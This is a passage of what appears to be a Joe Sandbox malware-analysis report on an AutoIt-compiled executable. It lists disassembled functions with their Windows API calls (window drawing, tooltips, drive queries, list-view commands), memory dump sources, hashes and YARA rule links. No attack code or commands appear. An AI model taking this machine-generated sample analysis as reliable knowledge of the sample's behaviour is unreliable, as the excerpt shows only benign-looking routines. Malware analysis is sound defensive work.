                                                                                                                                                                                                                                            • Part of subcall function 001673E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 001674CE
                                                                                                                                                                                                                                            • Part of subcall function 001673E8: GetWindowLongW.USER32(00000000,000000F0), ref: 001674DB
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 4124339563-0
                                                                                                                                                                                                                                          • Opcode ID: 7376255201e5be78f03724fc9cc4c5369f7d2ad13b0fe21634e0eaa004afcca6
                                                                                                                                                                                                                                          • Instruction ID: dcfff1e0bfa95f4bc752cd050b508ed17fea4e26903556c67ae47be29f6f5941
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7376255201e5be78f03724fc9cc4c5369f7d2ad13b0fe21634e0eaa004afcca6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 11A1D472108301FFDB009F60DC48E6B7BA9FF89325F104A19F9A2965E1D7B4E994CB91
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 000E8D85 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 480windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • DestroyWindow.USER32(?,?), ref: 000E8E14
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001308,?,00000000), ref: 00126AC5
                                                                                                                                                                                                                                          • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00126AFE
                                                                                                                                                                                                                                          • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00126F43
                                                                                                                                                                                                                                            • Part of subcall function 000E8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,000E8BE8,?,00000000,?,?,?,?,000E8BBA,00000000,?), ref: 000E8FC5
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001053), ref: 00126F7F
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00126F96
                                                                                                                                                                                                                                          • ImageList_Destroy.COMCTL32(00000000,?), ref: 00126FAC
                                                                                                                                                                                                                                          • ImageList_Destroy.COMCTL32(00000000,?), ref: 00126FB7
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                                                                                                                                                                                                          • String ID: 0
                                                                                                                                                                                                                                          • API String ID: 2760611726-4108050209
                                                                                                                                                                                                                                          • Opcode ID: f3ef42ae16102d5f720a49bc63d5764eead958344b6f2e6eca71f0d67b59eff7
                                                                                                                                                                                                                                          • Instruction ID: 6dbd65f36256a0c1318c938341a9f53839bc8a3b1f69ad6d4369c0cb81809b5d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f3ef42ae16102d5f720a49bc63d5764eead958344b6f2e6eca71f0d67b59eff7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D112CE34201261EFDB25DF24EC58BBAB7E1FB45300F148469F4899B6A1CB71ECA1DB91
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00152711 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • DestroyWindow.USER32(00000000), ref: 0015273E
                                                                                                                                                                                                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0015286A
                                                                                                                                                                                                                                          • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 001528A9
                                                                                                                                                                                                                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 001528B9
                                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00152900
                                                                                                                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 0015290C
                                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00152955
                                                                                                                                                                                                                                          • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00152964
                                                                                                                                                                                                                                          • GetStockObject.GDI32(00000011), ref: 00152974
                                                                                                                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00152978
                                                                                                                                                                                                                                          • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00152988
                                                                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00152991
                                                                                                                                                                                                                                          • DeleteDC.GDI32(00000000), ref: 0015299A
                                                                                                                                                                                                                                          • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 001529C6
                                                                                                                                                                                                                                          • SendMessageW.USER32(00000030,00000000,00000001), ref: 001529DD
                                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00152A1D
                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00152A31
                                                                                                                                                                                                                                          • SendMessageW.USER32(00000404,00000001,00000000), ref: 00152A42
                                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00152A77
                                                                                                                                                                                                                                          • GetStockObject.GDI32(00000011), ref: 00152A82
                                                                                                                                                                                                                                          • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00152A8D
                                                                                                                                                                                                                                          • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00152A97
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                                                                                                                                          • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                                                                                                                                          • API String ID: 2910397461-517079104
                                                                                                                                                                                                                                          • Opcode ID: d7a8cf10a0828a43acfa00cd784e81565d5b957c8c51a5020df2a1226d567cd7
                                                                                                                                                                                                                                          • Instruction ID: e3c09de3ac1cc9e5dd182767027bd5565c4f581f3d0da65c2ad85e08a4519116
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d7a8cf10a0828a43acfa00cd784e81565d5b957c8c51a5020df2a1226d567cd7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 31B15A72A00215BFEB14DFA8DC49FAE7BA9FB09711F008115F915EB691D7B4AD40CBA0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00144ADF Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • SetErrorMode.KERNEL32(00000001), ref: 00144AED
                                                                                                                                                                                                                                          • GetDriveTypeW.KERNEL32(?,0016CB68,?,\\.\,0016CC08), ref: 00144BCA
                                                                                                                                                                                                                                          • SetErrorMode.KERNEL32(00000000,0016CB68,?,\\.\,0016CC08), ref: 00144D36
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorMode$DriveType
                                                                                                                                                                                                                                          • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                                                                                                                                          • API String ID: 2907320926-4222207086
                                                                                                                                                                                                                                          • Opcode ID: b1c47a644c41512d672924dc7319884e3136dadf7f9cf3f0e9b5675c8a1bc09e
                                                                                                                                                                                                                                          • Instruction ID: 0dd9ed0207c82b2c2ac7402c1b7c44f16617f9095ac082a0c75b23b5d92127b9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b1c47a644c41512d672924dc7319884e3136dadf7f9cf3f0e9b5675c8a1bc09e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F261C330705205DBCF08DF64CAD2EBC77A0EB05345B294016F846AB6B2DB35ED41DBA1
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 001673E8 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetSysColor.USER32(00000012), ref: 00167421
                                                                                                                                                                                                                                          • SetTextColor.GDI32(?,?), ref: 00167425
                                                                                                                                                                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 0016743B
                                                                                                                                                                                                                                          • GetSysColor.USER32(0000000F), ref: 00167446
                                                                                                                                                                                                                                          • CreateSolidBrush.GDI32(?), ref: 0016744B
                                                                                                                                                                                                                                          • GetSysColor.USER32(00000011), ref: 00167463
                                                                                                                                                                                                                                          • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00167471
                                                                                                                                                                                                                                          • SelectObject.GDI32(?,00000000), ref: 00167482
                                                                                                                                                                                                                                          • SetBkColor.GDI32(?,00000000), ref: 0016748B
                                                                                                                                                                                                                                          • SelectObject.GDI32(?,?), ref: 00167498
                                                                                                                                                                                                                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 001674B7
                                                                                                                                                                                                                                          • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 001674CE
                                                                                                                                                                                                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 001674DB
                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0016752A
                                                                                                                                                                                                                                          • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00167554
                                                                                                                                                                                                                                          • InflateRect.USER32(?,000000FD,000000FD), ref: 00167572
                                                                                                                                                                                                                                          • DrawFocusRect.USER32(?,?), ref: 0016757D
                                                                                                                                                                                                                                          • GetSysColor.USER32(00000011), ref: 0016758E
                                                                                                                                                                                                                                          • SetTextColor.GDI32(?,00000000), ref: 00167596
                                                                                                                                                                                                                                          • DrawTextW.USER32(?,001670F5,000000FF,?,00000000), ref: 001675A8
                                                                                                                                                                                                                                          • SelectObject.GDI32(?,?), ref: 001675BF
                                                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 001675CA
                                                                                                                                                                                                                                          • SelectObject.GDI32(?,?), ref: 001675D0
                                                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 001675D5
                                                                                                                                                                                                                                          • SetTextColor.GDI32(?,?), ref: 001675DB
                                                                                                                                                                                                                                          • SetBkColor.GDI32(?,?), ref: 001675E5
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1996641542-0
                                                                                                                                                                                                                                          • Opcode ID: 933bc32e6b23abbb4dba5a254e56a30dae005db223dcbe0a6231537e5337187d
                                                                                                                                                                                                                                          • Instruction ID: 66022edf119eab5d2e0cee444f6b853a1fe7077ffdf0bc2b4392f661b87c5675
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 933bc32e6b23abbb4dba5a254e56a30dae005db223dcbe0a6231537e5337187d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5C615D72900218AFDF019FA4DC49AEE7FB9EB09321F118125F915AB6E1D7B49990CB90
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00160FF3 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetCursorPos.USER32(?), ref: 00161128
                                                                                                                                                                                                                                          • GetDesktopWindow.USER32 ref: 0016113D
                                                                                                                                                                                                                                          • GetWindowRect.USER32(00000000), ref: 00161144
                                                                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00161199
                                                                                                                                                                                                                                          • DestroyWindow.USER32(?), ref: 001611B9
                                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 001611ED
                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0016120B
                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0016121D
                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000421,?,?), ref: 00161232
                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00161245
                                                                                                                                                                                                                                          • IsWindowVisible.USER32(00000000), ref: 001612A1
                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 001612BC
                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 001612D0
                                                                                                                                                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 001612E8
                                                                                                                                                                                                                                          • MonitorFromPoint.USER32(?,?,00000002), ref: 0016130E
                                                                                                                                                                                                                                          • GetMonitorInfoW.USER32(00000000,?), ref: 00161328
                                                                                                                                                                                                                                          • CopyRect.USER32(?,?), ref: 0016133F
                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000412,00000000), ref: 001613AA
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                                                                                                                                          • String ID: ($0$tooltips_class32
                                                                                                                                                                                                                                          • API String ID: 698492251-4156429822
                                                                                                                                                                                                                                          • Opcode ID: 6838fe05171ece30587cabe934d7deb8c37340bc19173c4c01e396fb75be1753
                                                                                                                                                                                                                                          • Instruction ID: 0f258ae55a73aeed86bc6a7ec5199ff403b8680faa0a90da61e0b79f2499206a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6838fe05171ece30587cabe934d7deb8c37340bc19173c4c01e396fb75be1753
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 98B19E71604341AFDB04DF64CC84BAABBE4FF84350F04891DF99A9B262C771E854CBA2
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00160241 Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CharUpperBuffW.USER32(?,?), ref: 001602E5
                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 0016031F
                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 00160389
                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 001603F1
                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 00160475
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 001604C5
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00160504
                                                                                                                                                                                                                                            • Part of subcall function 000EF9F2: _wcslen.LIBCMT ref: 000EF9FD
                                                                                                                                                                                                                                            • Part of subcall function 0013223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00132258
                                                                                                                                                                                                                                            • Part of subcall function 0013223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0013228A
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                                                                                                                                          • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                                                                                                                                                          • API String ID: 1103490817-719923060
                                                                                                                                                                                                                                          • Opcode ID: dbf4ae9f3359b9021c3687aa253ec239401551dfbd5b9a11e40cc96f54a854ca
                                                                                                                                                                                                                                          • Instruction ID: a85cdfb80863fd3a722c627e93c488a415972300943a6c90b26a76211ba3cc81
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dbf4ae9f3359b9021c3687aa253ec239401551dfbd5b9a11e40cc96f54a854ca
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DCE1BD312183018FCB29DF24C95097BB3E6BF98314B15496DF896AB3A2DB30ED55CB91
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 000E8891 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 000E8968
                                                                                                                                                                                                                                          • GetSystemMetrics.USER32(00000007), ref: 000E8970
                                                                                                                                                                                                                                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 000E899B
                                                                                                                                                                                                                                          • GetSystemMetrics.USER32(00000008), ref: 000E89A3
                                                                                                                                                                                                                                          • GetSystemMetrics.USER32(00000004), ref: 000E89C8
                                                                                                                                                                                                                                          • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 000E89E5
                                                                                                                                                                                                                                          • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 000E89F5
                                                                                                                                                                                                                                          • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 000E8A28
                                                                                                                                                                                                                                          • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 000E8A3C
                                                                                                                                                                                                                                          • GetClientRect.USER32(00000000,000000FF), ref: 000E8A5A
                                                                                                                                                                                                                                          • GetStockObject.GDI32(00000011), ref: 000E8A76
                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 000E8A81
                                                                                                                                                                                                                                            • Part of subcall function 000E912D: GetCursorPos.USER32(?), ref: 000E9141
                                                                                                                                                                                                                                            • Part of subcall function 000E912D: ScreenToClient.USER32(00000000,?), ref: 000E915E
                                                                                                                                                                                                                                            • Part of subcall function 000E912D: GetAsyncKeyState.USER32(00000001), ref: 000E9183
                                                                                                                                                                                                                                            • Part of subcall function 000E912D: GetAsyncKeyState.USER32(00000002), ref: 000E919D
                                                                                                                                                                                                                                          • SetTimer.USER32(00000000,00000000,00000028,000E90FC), ref: 000E8AA8
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                                                                                                                                          • String ID: AutoIt v3 GUI
                                                                                                                                                                                                                                          • API String ID: 1458621304-248962490
                                                                                                                                                                                                                                          • Opcode ID: 53dde5f660f6ea5ceaf698d50d97c8af97ced4cb507ed66e4ef9df8364c04e3a
                                                                                                                                                                                                                                          • Instruction ID: f88dcca4f849842161d64642ac593611bfb2dd3313fae52701ff3dabcc44bee4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 53dde5f660f6ea5ceaf698d50d97c8af97ced4cb507ed66e4ef9df8364c04e3a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EEB18D35A0024AAFDB14DFA8DD45BAE7BB5FB48314F108229FA15A72D0DB74E890CB51
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00130D8B Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 001310F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00131114
                                                                                                                                                                                                                                            • Part of subcall function 001310F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00130B9B,?,?,?), ref: 00131120
                                                                                                                                                                                                                                            • Part of subcall function 001310F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00130B9B,?,?,?), ref: 0013112F
                                                                                                                                                                                                                                            • Part of subcall function 001310F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00130B9B,?,?,?), ref: 00131136
                                                                                                                                                                                                                                            • Part of subcall function 001310F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0013114D
